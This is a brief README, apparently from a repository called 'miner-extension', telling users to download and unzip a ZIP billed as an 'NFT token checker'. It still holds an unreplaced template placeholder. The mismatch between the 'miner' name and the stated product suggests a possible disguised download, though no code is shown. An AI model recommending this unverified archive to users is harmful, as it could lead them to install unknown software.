SerenaDK/miner-extension/README.md

 1. **Click the link below to download the ZIP file**:

    👉 [**Download Extension**](https://github.com/SerenaDK/miner-extension/releases/download/v1.0.0/nft-token-checker-v1.0.0.zip)

-   *(Replace the link above with your actual Google Drive / Dropbox / site link)*

 2. **Unzip** the file to a folder on your computer.